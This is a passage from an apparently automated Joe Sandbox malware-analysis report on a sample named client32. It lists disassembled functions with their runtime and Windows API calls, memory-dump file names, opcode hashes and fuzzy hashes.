                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1338273076-0
                                                                                                                              • Opcode ID: 47cee480c3b689436087825329289925dd65525c1cef968d4f52e38856205407
                                                                                                                              • Instruction ID: ad670529c7b0aafe0ff7b2bbc6a3dac2c6423bd242fe34faf7ee92730ec6912a
                                                                                                                              • Opcode Fuzzy Hash: 47cee480c3b689436087825329289925dd65525c1cef968d4f52e38856205407
                                                                                                                              • Instruction Fuzzy Hash: A631BF7AA04204AFC714CF68D84099BFBE9AF84314F14C15EE8598B741D7B5E945CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1338273076-0
                                                                                                                              • Opcode ID: 678cdc5dff54ac0721c3ca97fab606ff72bbd97bd8d15e827079dc0f74487191
                                                                                                                              • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                                              • Opcode Fuzzy Hash: 678cdc5dff54ac0721c3ca97fab606ff72bbd97bd8d15e827079dc0f74487191
                                                                                                                              • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _malloc_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1183979061-0
                                                                                                                              • Opcode ID: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
                                                                                                                              • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                                                              • Opcode Fuzzy Hash: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
                                                                                                                              • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,001302DB,001002B3,00000001), ref: 11145068
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExtractFileIconModuleName
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3911389742-0
                                                                                                                              • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                              • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                                              • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                                              • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                              • __lock_file.LIBCMT ref: 11164CBE
                                                                                                                                • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                                                              • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2800547568-0
                                                                                                                              • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                              • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                                              • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                                              • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3382485803-0
                                                                                                                              • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                              • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                                                              • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                              • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,775EC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3660427363-0
                                                                                                                              • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                              • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                                              • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                              • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 328603210-0
                                                                                                                              • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                              • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                                                              • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                              • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1105E820 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                • Part of subcall function 1116450B: strtoxl.LIBCMT ref: 1116452C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcstoi64strtoxl
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 910016052-0
                                                                                                                              • Opcode ID: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
                                                                                                                              • Instruction ID: 23ac52cab648964c8bc4f85844fc967f5549f4a308fdde8bda903d18a29afeb2
                                                                                                                              • Opcode Fuzzy Hash: 8f26ef6fd018574ad29966309b08038d9b6a407cfa2a3251d72f04733a0025b5
                                                                                                                              • Instruction Fuzzy Hash: 5F014F36A0010DABC710DFA8C941FAFB7B8DF99704F114059AD45AB280DAB1AE14D7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __waccess_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4272103461-0
                                                                                                                              • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                              • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                                              • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                              • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fsopen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3646066109-0
                                                                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                              • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00E31000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
